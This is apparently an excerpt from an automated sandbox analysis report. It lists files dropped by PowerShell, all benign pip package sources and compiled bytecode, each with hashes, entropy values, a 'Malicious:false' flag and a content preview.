                                                                                                                                                                                                              SHA-512:5CDFF90DAC5C60C879D01B21EF88FDF2673A3D69DC37731ED11520F589434086781E9AB5B97EE2FF7354218780654E261196B429A1B13A7B48D9566ED4AE9551
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e...............................U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................d.........Z...e.j...................d.........Z.e.e.d.<...d.e.f.d...Z.d.e.d.e.d.e.f.d...Z.d.e.f.d...Z.....e.j*..........................Z.e.j...................e.....e.d.<.....e.j4..................d...........d.e.f.d...........Z.y.#.e.$.r...e.j2..................Z.Y..0w.x.Y.w.)......N)...InstallationError)...appdirs)...running_under_virtualenv..pip..purelib..site_packages..returnc.....................<.......d.j...................t.........j.....................S.).ze. Return the major-minor version of the current Python as a string, e.g.. "3.7" or "3.10".. z.{}.{})...format..sys..version_info........pC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/locations/base.py..get_major_minor_versionr........s............7.>.>.3..+..+..,..,r......new_root..pathnamec.......................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6009
                                                                                                                                                                                                              Entropy (8bit):4.6472416335794415
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:RF98DyqqXDIMgcuWM/1DAg/K2uD3A0lgznaoi8RbdLiF4WNZCjKc9Gv:RF98DyqqsnctM/ymcoZRxj8Q26Gv
                                                                                                                                                                                                              MD5:E1354E87EC259E8DC27206CB2D011AA0
                                                                                                                                                                                                              SHA1:10CDF71B7814400226BFCE22B99AB43B5FE7C6C5
                                                                                                                                                                                                              SHA-256:1FD6472BFDF9ADD0D5D50B268B841E68150B8C54F831BBBA42EA151A427A4072
                                                                                                                                                                                                              SHA-512:7E7E1F9A020EDD0C6399495BD80F2D692E85FCD859A21935AA92EB3CE7D628663EF04679EF89D732E03D90E8D8F08F89826835632135BF10ABBF0B6C444A7072
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Locations where we look for configs, install stuff, etc"""..# The following comment should be removed at some point in the future..# mypy: strict-optional=False..# If pip's going to use distutils, it should not be using the copy that setuptools.# might have injected into the environment. This is done by removing the injected.# shim, if it's injected..#.# See https://github.com/pypa/pip/issues/8761 for the original discussion and.# rationale for why this is done within pip..try:. __import__("_distutils_hack").remove_shim().except (ImportError, AttributeError):. pass..import logging.import os.import sys.from distutils.cmd import Command as DistutilsCommand.from distutils.command.install import SCHEME_KEYS.from distutils.command.install import install as distutils_install_command.from distutils.sysconfig import get_python_lib.from typing import Dict, List, Optional, Union, cast..from pip._internal.models.scheme import Scheme.from pip._internal.utils.compat import WINDOWS.from pip
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7680
                                                                                                                                                                                                              Entropy (8bit):4.866991580048859
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:JdCOcPkYiopsT6b9LstdkNBRVzXG9eSvwY33Ast:Jd5cPRiopsubhs3kvRieSFR
                                                                                                                                                                                                              MD5:7BB5B79402F716198A5CE0A8D07929E4
                                                                                                                                                                                                              SHA1:9AB439BD5F5B0F6478D0DC17DA2FA87733F01F32
                                                                                                                                                                                                              SHA-256:8F2355B547CC21FD26B7263E5E9D66F7243C8B0102A334955459A390DF5ADB2C
                                                                                                                                                                                                              SHA-512:F3AB05449D50ABCB688C6BF9BFDBC58EA8D7626093EBC98CE7E39881FFD66AE88A10C1A64CA37CF99391DC52F065E4C28D6345AD407DE3E7FFC12C6FCAC2AB32
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import logging.import os.import sys.import sysconfig.import typing..from pip._internal.exceptions import InvalidSchemeCombination, UserInstallationInvalid.from pip._internal.models.scheme import SCHEME_KEYS, Scheme.from pip._internal.utils.virtualenv import running_under_virtualenv..from .base import change_root, get_major_minor_version, is_osx_framework..logger = logging.getLogger(__name__)...# Notes on _infer_* functions..# Unfortunately ``get_default_scheme()`` didn't exist before 3.10, so there's no.# way to ask things like "what is the '_prefix' scheme on this platform". These.# functions try to answer that with some heuristics while accounting for ad-hoc.# platforms not covered by CPython's default sysconfig implementation. If the.# ad-hoc implementation does not fully implement sysconfig, we'll fall back to.# a POSIX scheme..._AVAILABLE_SCHEMES = set(sysconfig.get_scheme_names()).._PREFERRED_SCHEME_API = getattr(sysconfig, "get_preferred_scheme", None)...def _should_use_osx_fram
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2556
                                                                                                                                                                                                              Entropy (8bit):4.7400258499487755
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:xNd8HSftSqBN9bjWfq2KF3aAgoZri6dQWJjaRgLGhNlpLKGBfhRwnA/8OZ:Hd8ykq5jZGoTdQgygLGvl1WOZ
                                                                                                                                                                                                              MD5:DF3959ADC2DB3EB93E958438AD137A98
                                                                                                                                                                                                              SHA1:B8E2670E06883B1AC1244F41EB9D63B50704C3CE
                                                                                                                                                                                                              SHA-256:45088F8B5778155336071934E1D4215D9D8FAA47A58C42F67D967D498A8843BF
                                                                                                                                                                                                              SHA-512:81E4C30D31B670524C1BC9CDE2395F212025D6EDD14A1489932CA5220CF49423B99E4B38A76BA5243AF6931B1CB7050AA0AE4BCD09D46D403D3C7185350C8EB0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import functools.import os.import site.import sys.import sysconfig.import typing..from pip._internal.exceptions import InstallationError.from pip._internal.utils import appdirs.from pip._internal.utils.virtualenv import running_under_virtualenv..# Application Directories.USER_CACHE_DIR = appdirs.user_cache_dir("pip")..# FIXME doesn't account for venv linked to global site-packages.site_packages: str = sysconfig.get_path("purelib")...def get_major_minor_version() -> str:. """. Return the major-minor version of the current Python as a string, e.g.. "3.7" or "3.10".. """. return "{}.{}".format(*sys.version_info)...def change_root(new_root: str, pathname: str) -> str:. """Return 'pathname' with 'new_root' prepended... If 'pathname' is relative, this is equivalent to os.path.join(new_root, pathname).. Otherwise, it requires making 'pathname' relative and then joining the. two, which is tricky on DOS/Windows and Mac OS... This is borrowed from Python's standard
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):340
                                                                                                                                                                                                              Entropy (8bit):4.624535788985788
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:1REYB9HH3G5laLRIIQrHGKGX+KLELwJqWl3VY2wVdLcJ+9EWaFSQ3Z/IRkpdln:1REYB925glIRro+dCle2+LcJWGORMl
                                                                                                                                                                                                              MD5:0BB4FE239F44137D18D96E9ECB11195E
                                                                                                                                                                                                              SHA1:442943CD1FA0793DD0A43F75DA3843AE3F9C67DE
                                                                                                                                                                                                              SHA-256:AFE52751EF072E8E57149CFC8A74DC38E4E2BBFB313618076FA57094652594E2
                                                                                                                                                                                                              SHA-512:D0BC69F04490BA5B312223F10D854E8ED6BCEFF8F58E45FA0C7C0DB304B4D912A3BE565E02FE858459E49EBFCA4665677CF66A2137F6754C3A4A573076100291
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import List, Optional...def main(args: Optional[List[str]] = None) -> int:. """This is preserved for old console scripts that may still be referencing. it... For additional details, see https://github.com/pypa/pip/issues/7498.. """. from pip._internal.utils.entrypoints import _wrapper.. return _wrapper(args).
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4339
                                                                                                                                                                                                              Entropy (8bit):4.78736796617486
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:mkwC9i3293+/9QZRaCo4gR8+Gt68rly/tRDSg:m8ieRZRaD4g8+GEYly/tVSg
                                                                                                                                                                                                              MD5:3A438AE5A4F53D86071F39E033A9239D
                                                                                                                                                                                                              SHA1:27F3DDFC360D5F981F11DAE326EDE574B7519713
                                                                                                                                                                                                              SHA-256:F695375B7B3EE87B6316E62159C2D36159926B38A494FBFB936C7CA7B5F51A60
                                                                                                                                                                                                              SHA-512:0FAE6D35237331D6875CC927E3FAE4DF680D178D66B11571B7BAB988F5244D77497209A579B0AAE837575019B013B12F0963B6E5321D768CD1DBCFA2C2DDDFA5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import contextlib.import functools.import os.import sys.from typing import TYPE_CHECKING, List, Optional, Type, cast..from pip._internal.utils.misc import strtobool..from .base import BaseDistribution, BaseEnvironment, FilesystemWheel, MemoryWheel, Wheel..if TYPE_CHECKING:. from typing import Literal, Protocol.else:. Protocol = object..__all__ = [. "BaseDistribution",. "BaseEnvironment",. "FilesystemWheel",. "MemoryWheel",. "Wheel",. "get_default_environment",. "get_environment",. "get_wheel_distribution",. "select_backend",.]...def _should_use_importlib_metadata() -> bool:. """Whether to use the ``importlib.metadata`` or ``pkg_resources`` backend... By default, pip uses ``importlib.metadata`` on Python 3.11+, and. ``pkg_resourcess`` otherwise. This can be overridden by a couple of ways:.. * If environment variable ``_PIP_USE_IMPORTLIB_METADATA`` is set, it. dictates whether ``importlib.metadata`` is used, regardless of Python. ver
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5899
                                                                                                                                                                                                              Entropy (8bit):5.372948756285595
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:OBHxwC9i3293+/aYgrKSVf94Gtlv5rVv/75DHRm97oLwB:OBHJieyaYKJVF4GbvRp/7txm970wB
                                                                                                                                                                                                              MD5:3F71D58996A512A08E3F3C4D00BE90E9
                                                                                                                                                                                                              SHA1:DD09E66A0D4E0E19DE6C7391E7FB806CE0625E70
                                                                                                                                                                                                              SHA-256:8F998383AE975340260821CD556E418A7A0E01600D6FBC843DF2A80A2CDA0D3E
                                                                                                                                                                                                              SHA-512:B61F8309B5E89E03178E352203B60A0284B554B57BC601CE1E2351F46C7FA2959AB22C40EA51D9F2B2AC32F2C6F85CBE20244A40B081029E7E0DAFB3018B7C0F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e..........................H.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...e.r.d.d.l.m.Z.m.Z...n.e.Z.g.d...Z.d.e.f.d...Z...G.d...d.e.........Z...e.j2..................d...........d.e.f.d...........Z.d.e.f.d...Z.d.e.e.e.........d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.d.e.f.d...Z.d.e d.e.d.e.d.e.f.d...Z!y.)......N)...TYPE_CHECKING..List..Optional..Type..cast)...strtobool.....)...BaseDistribution..BaseEnvironment..FilesystemWheel..MemoryWheel..Wheel)...Literal..Protocol).r....r....r....r....r......get_default_environment..get_environment..get_wheel_distribution..select_backend..returnc.....................$.....t.........j...................t.........t.................5...t.........t.........t.........j...................d.....................c.d.d.d...........S.#.1.s.w...Y.....n.x.Y.w.t.........j...................d.k...r.y.d.d.l.}.t.........t.........|.j...................d.d.................S.).a....Whether to use the ``i
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2892
                                                                                                                                                                                                              Entropy (8bit):5.689285629599646
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Yz9Zmmf2mPP2X32umbQlui0E7Z7XiLKRZEZvxvu3JA/6OH/haRm4wDf0s4Vk/0b:Yz9hf2mP0W24E7Z7yLIEZJvWJ0tfh1DQ
                                                                                                                                                                                                              MD5:2AF44398CC1043EFF3263ED22D22BD65
                                                                                                                                                                                                              SHA1:EB7B7EFCA68C58DEB822DBA6E3D4DE055F053CAD
                                                                                                                                                                                                              SHA-256:7519684F997638D82919B2454A9087CFED9CB342B6E8F3AA866611461A7DA334
                                                                                                                                                                                                              SHA-512:FA0485EB9FD8F2734304EA559A7E730CE62B97060146554E8A6ACFDF38840075A8F7651C967BFB46B520B9721AB1F6B54DBC4C93D5204B835D7E895AC46B24AB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.eC.........................n.....d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...g.d...Z.d.e.d.e.f.d...Z.d.e.d.e.e.e.f.....f.d...Z.y.)......)...Header..decode_header..make_header)...Message)...Any..Dict..List..Union).).z.Metadata-VersionF)...NameF)...VersionF)...DynamicT)...PlatformT).z.Supported-PlatformT)...SummaryF)...DescriptionF).z.Description-Content-TypeF)...KeywordsF).z.Home-pageF).z.Download-URLF)...AuthorF).z.Author-emailF)...MaintainerF).z.Maintainer-emailF)...LicenseF)...ClassifierT).z.Requires-DistT).z.Requires-PythonF).z.Requires-ExternalT).z.Project-URLT).z.Provides-ExtraT).z.Provides-DistT).z.Obsoletes-DistT..field..returnc.....................B.....|.j...........................j...................d.d.........S.).N..-.._)...lower..replace).r....s.... .pC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/metadata/_json.py..json_namer....%...s..........;.;.=.. .. ...c..*..*.......msgc..........................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):35729
                                                                                                                                                                                                              Entropy (8bit):5.390201246234604
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:YbWEWQnAaUKs9GYU9UunejwQHCoDXMjLk6cVOZiqZyWWXPq5zh7QyPuAV0hDHA7W:gnAEejwQHCbjLk62OZiqVWXSxhN6h8W
                                                                                                                                                                                                              MD5:FD3A758A6119BC8D0655304370A73652
                                                                                                                                                                                                              SHA1:9A4F9DD6231A7CB7729540140918A1527153EB88
                                                                                                                                                                                                              SHA-256:57B2E6E410906775F6FD9A272306A1FED003520D1355D3B05985D3D85934F679
                                                                                                                                                                                                              SHA-512:24AAF135B64414536B22C79E64C166CA42016C176548E495433BD2A32370C29068E81AC70F6D26ED1549DBEDC9F828E13681A1831EF0A4A59E6DD0E44270CC82
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e3e........................V.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m Z m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..d.d.l'm(Z(m)Z)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/m0Z0m1Z1..d.d.l2m3Z3..d.d.l4m5Z5..e.r.d.d.l.m6Z6..n.e7Z6e.e e!f.....Z8e.e9e.jt..................f.....Z;..e.jx..................e=........Z>..G.d...d.e6........Z?d.e.e9d.f.....d.e.e9d.f.....d.e9f.d...Z@..G.d...d.e.........ZA..G.d...d.e6........ZB..G.d...d.........ZC..G.d...d.e6........ZD..G.d ..d!eD........ZE..G.d"..d#eD........ZFy.)$.....N)...IO..TYPE_CHECKING..Any..Collection..Container..Dict..Iterable..Iterator..List..NamedTuple..Optional..Tuple..Union)...Requirement)...InvalidSpecifier..SpecifierSet)...NormalizedName..canonicalize_name)...LegacyVersion..Version)...NoneMetadataError)...site_packages..user_site)...DIRECT_URL_METADATA_NAME..DirectUrl..DirectUrlValidationError)...stdli
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15804
                                                                                                                                                                                                              Entropy (8bit):5.200523380085259
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:EokrNgLb1P7zPfMwpcaaUiIXzKo3+b+ESaZGyjty9Z/aodjAKxqc:CBgLBP7z3MwaNyKbeyjty9dHrxqc
                                                                                                                                                                                                              MD5:071179609E5659FDB0B6F38389E66DB7
                                                                                                                                                                                                              SHA1:8D5ABA9E7B7B069BAAFF9ACA58676B72B9B90940
                                                                                                                                                                                                              SHA-256:DA40163A4FED12DB6988776E925FA28DDB3886B252615A9B9BB2A0EA864C43E7
                                                                                                                                                                                                              SHA-512:F72B0465507B7DA95B8009C930C5A1D94C4CCB9A42FFD1ED8436171C74AAF940FFDD04A579182509A9C94B56FF7D52276CAB21B8513DD0CFA07A82543FEEE8EE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e3'........................j.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m Z ..d.d.l!m"Z"m#Z#..d.d.l$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*..g.d...Z+..e.jX..................e-........Z.d.Z/..G.d...d.e.........Z0..G.d...d.........Z1..G.d...d.e%........Z2..G.d...d.e'........Z3y.)......N)...Collection..Iterable..Iterator..List..Mapping..NamedTuple..Optional)...pkg_resources)...Requirement)...NormalizedName..canonicalize_name)...parse)...InvalidWheel..NoneMetadataError..UnsupportedWheel)...egg_link_path_from_location)...display_path..normalize_path)...parse_wheel..read_wheel_metadata_file.....)...BaseDistribution..BaseEntryPoint..BaseEnvironment..DistributionVersion..InfoPath..Wheel)...NAME..Distribution..Environmentr....c.....................,.....e.Z.d.Z.U.e.e.d.<...e.e.d.<...e.e.d.<...y.)...EntryPoint..name..value..groupN)...__name__..__module__..__qualname__..s
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2627
                                                                                                                                                                                                              Entropy (8bit):4.480026694538661
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:abXOHAkkJ29i/bARRoJ6p/GUKnPF4VZgyRfeg+q9waXmPy8qQjzaFF3TFFot:OXsAnJ2E/6RoJ6p/JiPyAYD+qwaXejqE
                                                                                                                                                                                                              MD5:55D212D8C700DDEB044012375AD7B560
                                                                                                                                                                                                              SHA1:F2089D3ECDFA459D011D166251904B1AF6CA3964
                                                                                                                                                                                                              SHA-256:473E4CE5C89236F213C1A4D047A35F37C4E02A033959F4F0B380FA085927A2F1
                                                                                                                                                                                                              SHA-512:DE07561329CD8D733A02DEEFC707467867D3EBABD945CEDDCF642CEF32F29823C47393545BD9F8745CA44BB0764F4C085EC0122B6652DFC55685F0F5E8B67A9F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Extracted from https://github.com/pfmoore/pkg_metadata..from email.header import Header, decode_header, make_header.from email.message import Message.from typing import Any, Dict, List, Union..METADATA_FIELDS = [. # Name, Multiple-Use. ("Metadata-Version", False),. ("Name", False),. ("Version", False),. ("Dynamic", True),. ("Platform", True),. ("Supported-Platform", True),. ("Summary", False),. ("Description", False),. ("Description-Content-Type", False),. ("Keywords", False),. ("Home-page", False),. ("Download-URL", False),. ("Author", False),. ("Author-email", False),. ("Maintainer", False),. ("Maintainer-email", False),. ("License", False),. ("Classifier", True),. ("Requires-Dist", True),. ("Requires-Python", False),. ("Requires-External", True),. ("Project-URL", True),. ("Provides-Extra", True),. ("Provides-Dist", True),. ("Obsoletes-Dist", True),.]...def json_name(field: str) -> str:. return field.l
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25907
                                                                                                                                                                                                              Entropy (8bit):4.510742658726637
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:b+/p4A7xsYUPhrlPigLnaT5/Q1DX3hTzJxsAT3ZTJXw5uajuH:8BjgbG5YdNz4ATVJXw5uF
                                                                                                                                                                                                              MD5:C822C339F8E7369CA654DEC33E98034F
                                                                                                                                                                                                              SHA1:C314E363F75351CB40444ABBB4523097079D3C6A
                                                                                                                                                                                                              SHA-256:9775A092EE31960AFCB38A7A7D2FB7A90E1028EA4F6D62D1C22E5DF68984146E
                                                                                                                                                                                                              SHA-512:EC1B4C9EF8A9651F7F89E10A444987ABDC40B89397706724BF8F5466C9E3D86C7E9DE74D29DF95B5A20EE29A4E9F5198913C47D9BE380FA30E63B7C1F9DE1894
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import csv.import email.message.import functools.import json.import logging.import pathlib.import re.import zipfile.from typing import (. IO,. TYPE_CHECKING,. Any,. Collection,. Container,. Dict,. Iterable,. Iterator,. List,. NamedTuple,. Optional,. Tuple,. Union,.)..from pip._vendor.packaging.requirements import Requirement.from pip._vendor.packaging.specifiers import InvalidSpecifier, SpecifierSet.from pip._vendor.packaging.utils import NormalizedName, canonicalize_name.from pip._vendor.packaging.version import LegacyVersion, Version..from pip._internal.exceptions import NoneMetadataError.from pip._internal.locations import site_packages, user_site.from pip._internal.models.direct_url import (. DIRECT_URL_METADATA_NAME,. DirectUrl,. DirectUrlValidationError,.).from pip._internal.utils.compat import stdlib_pkgs # TODO: Move definition here..from pip._internal.utils.egg_link import egg_link_path_from_sys_path.from pip._internal.utils.mis
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):135
                                                                                                                                                                                                              Entropy (8bit):4.513944228305531
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:1L69SQoWcQNmIFL6uaFMxDdeK6EJJRFo+HrgJDhGQNs2eY3v9MolP:1LmSQzNLlDd1RJADhts2jMi
                                                                                                                                                                                                              MD5:994B6EDE7339C2D81DF1EC2FCF571A53
                                                                                                                                                                                                              SHA1:E7447ED9C17DB5DF5A9200DA03C4D0B8812CC185
                                                                                                                                                                                                              SHA-256:8D4522768C671DC7C84C71DA0161B51B68B97DD058925BFFB89723A36C7B5581
                                                                                                                                                                                                              SHA-512:91FF6287AB5B1AB4E81D92D30DC0948E6374908AF5B52CDA4B3E7B89CE84D9A81FDAAE9536914AFBDF9B69EE407425FDD458063B162BD55CE4883E152E43340A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from ._dists import Distribution.from ._envs import Environment..__all__ = ["NAME", "Distribution", "Environment"]..NAME = "importlib".
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):375
                                                                                                                                                                                                              Entropy (8bit):5.2518938415204435
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:L3icAYbwEBX44J9qXTwWequ95/n23d6oAreKAfAb6IagwtVpcln:rKYbzD9qDsqg/2Imb8jagEcl
                                                                                                                                                                                                              MD5:5734291DF6FD529FCDDF7C01EED372CD
                                                                                                                                                                                                              SHA1:A1715C761A0DFC11A0AD86CEDF1ADA8301EB243D
                                                                                                                                                                                                              SHA-256:260C6A5A1C12A007C2FC8EEB8A81B087D92478F6FCD66325961281DB203AA763
                                                                                                                                                                                                              SHA-512:E968DEF4BFCBF368039445B2782DCEB46F7A9061081E08A57B6F7609614D2D5B92850F9A937DE471D41B46236E4C7AB9EFB000D1B883492774D40C7AE9ED1735
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e..........................(.....d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.Z.y.)......)...Distribution)...Environment)...NAMEr....r......importlibN)..._distsr......_envsr......__all__r............}C:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/metadata/importlib/__init__.py..<module>r........s........... .....1.......r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3350
                                                                                                                                                                                                              Entropy (8bit):5.18613280944982
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:SfnN5lSxxn7NKTE+JGuDhv2qDrd65v18Pj:SfnN50352LDhv2Ge1Yj
                                                                                                                                                                                                              MD5:6E2654469357A2FE2CB6FDFCE08708C0
                                                                                                                                                                                                              SHA1:8E49BE91C0CB359E19811E0D3C875CB13FE74575
                                                                                                                                                                                                              SHA-256:781A28CCFB05422982A294DF442FB27F402A4D35BF0D15F49E0AF2796B8CC37B
                                                                                                                                                                                                              SHA-512:7F5F2EB8E461F3B41F6A69199C3FD0A7F006EA4ABA2D42A0E440BDFE7BF10ACDC9E2C33786D6D7C08AEBCF8DEDC0A66791F1C1B4F3A22483F83342F35A55436E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.eZ...............................d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.....G.d...d.e.........Z...G.d...d.e.........Z.d.e.j...................j...................d.e.e.....f.d...Z.d.e.j...................j...................d.e.f.d...Z.y.)......N)...Any..Optional..Protocol..castc.....................T.....e.Z.d.Z.d.e.j...................j...................d.e.d.d.f.d...Z.d.e.f.d...Z.y.)...BadMetadata..dist..reason..returnNc..................... .....|.|._.........|.|._.........y...N..r....r....)...selfr....r....s.... .|C:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/metadata/importlib/_compat.py..__init__z.BadMetadata.__init__....s.........................c.....................<.....d.|.j.....................d.|.j.....................d...S.).Nz.Bad metadata in z. (..)r......r....s.... r......__str__z.BadMetadata.__str__....s........!.$.).)...B.t.{.{.m.1..=..=r....)...__name__..__module__..__qualname__..importlib..metadata..Distributio
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13442
                                                                                                                                                                                                              Entropy (8bit):5.229733767394588
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:VkZo5FXozajvUwHJwPrWst6rSVyfVL+lm54+3ushCj91Ve478:VkZIF8aok+PrWKApVSm5dnhCj91wI8
                                                                                                                                                                                                              MD5:6B715AD17D33D1D706A3C7F3F6E2ADCE
                                                                                                                                                                                                              SHA1:65A50B0D8E99E6B4F34F37568B0DB7358786B94A
                                                                                                                                                                                                              SHA-256:828078BFE705726C5FB74082AA510F128F21A93A7069AFEE86B243B5AD616576
                                                                                                                                                                                                              SHA-512:B17A9B36CC47A51AD8B81B63D0AFAE7906E51F8EB2AFE735B7835C122511F2207D485D61E133BE37A34BCBF87E83D09FA7F50A7EF2C74CF582B69C1A46864E18
                                                                                                                                                                                                              Malicious:false
